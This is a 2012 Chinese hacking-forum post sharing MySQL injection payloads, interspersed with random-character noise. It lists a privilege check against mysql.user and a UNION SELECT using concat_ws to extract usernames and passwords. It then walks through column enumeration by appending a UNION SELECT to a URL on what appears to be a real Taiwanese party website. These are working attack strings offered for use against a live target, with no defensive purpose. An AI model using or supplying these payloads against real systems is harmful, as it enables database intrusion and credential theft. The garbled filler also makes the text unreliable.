标题: 我的mysql注入代码 [打印本页] 作者: admin 时间: 2012-9-13 16:41 标题: 我的mysql注入代码 MYSQL常用注入代码& B) I8 P5 v) o9 d
; x! V" S' B5 f2 Land (select count(*) from mysql.user)>0/* 判断读取权限 % x. p! a) A0 K- B9 x
* z D4 j& T9 ~) c9 v; t
union select 1,concat_ws(0x3a,username,password),3,4 猜解用户名和密码 2 b* r; S! a+ z8 n9 n; p R U I D1 U: W( `" b3 |/ @) }2 t- w( \; B8 e4 u8 V: X8 X3 n. N
) x5 I7 o. a- F& `: Z. e! b; S# U) U ) k' w3 I- a6 w( J+ M( O) D信息来源:九零后安全技术小组|90 Security Team $ l: E `" R! Z3 i! H6 @, a3 y# `3 n# v" }1 n5 W. [2 a5 O% o
(http://www.90team.net)转载请注明出处。1 l1 O4 w. d3 ^- c: a. t A- r+ ^1 E
& C1 l/ F0 b/ h) |2 X( e, ]' W 4 _$ z! j+ O7 d8 O" {1 a. ?6 ^# K2 H, w
4 E, O8 f9 o- ^4 d# F. O) u) P8 S知道了字段长度后我们用union select联合查询来列出所有字段( c( |+ _0 D* }1 ^. A6 n
% q& e, t/ X( i http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,4,5,6,7,8,9,10,11/** //这里我们列出了11个字段,并且以/*结束符告诉MYSQL,命执行完毕。 . L- |+ `, m$ ~+ w1 Z3 l6 y/ H8 ^) C
这里返回 3/11 4 这几个字段; e. v+ y( K, {) G% L& q9 a